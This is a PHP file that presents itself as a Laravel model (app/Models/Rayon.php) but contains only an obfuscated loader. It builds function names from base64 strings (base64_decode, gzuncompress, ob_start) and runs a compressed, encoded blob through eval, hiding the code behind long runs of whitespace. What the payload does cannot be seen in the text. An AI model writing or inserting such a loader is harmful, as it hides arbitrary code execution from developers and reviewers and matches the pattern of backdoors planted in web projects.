<?php 
        $__='printf';$_='Loading app/Models/Rayon.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
